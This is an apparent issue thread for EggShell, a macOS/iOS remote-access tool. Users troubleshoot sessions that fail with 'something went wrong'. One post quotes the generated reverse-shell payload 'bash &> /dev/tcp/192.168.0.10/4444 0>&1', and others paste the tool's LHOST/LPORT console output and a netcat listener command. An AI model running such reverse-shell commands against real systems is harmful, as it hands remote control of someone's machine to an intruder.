EggShell
EggShell copied to clipboard
Failed
I have try to use this exploit on a VM with Mac OS X Sierra, but the responde is wrong error
can you be more specific?
Yes, sorry, i have create a payload with my Parrot OS using eggshell "bash &> /dev/tcp/192.168.0.10/4444 0>&1 " and i have start server. But When i go to write my payload in OS X terminal the response is this:
" [] Listening on port 4444 [] Connecting to 192.168.0.11 [] Detected OS X [] Sending Payload [] Waiting For Connection. . . [] Type "help" for commands went wrong> "
and if i lunch a command for example "pwd" it print the error "something went wrong"
ok, I will look into this
Looks like the same error i got with ls
this is on startup though, its not receiving the computer name
How can I solve this problem
I don't know what is causing it yet
I will look into it
I try to use it to iPhone5(iOS7.1.2) and Mac OS X Sierra , went wrong also
EggShell> 1
SET LHOST (Leave blank for 10.100.78.208)>192.168.2.1
[*] LHOST = 192.168.2.1
SET LPORT (Leave blank for 4444)>
[*] LPORT = 4444
[*] Listening on port 4444...
[*] Connecting to 192.168.2.7
[*] Detected iOS
[*] Sending Payload
[*] Waiting For Connection...
[*] type "help" for commands
went wrong> ls
something went wrong
went wrong>
but if i use nc -vv -l 4444
in Mac OS X Sierra
I can successfully execute the shell command
I have exactly the same issue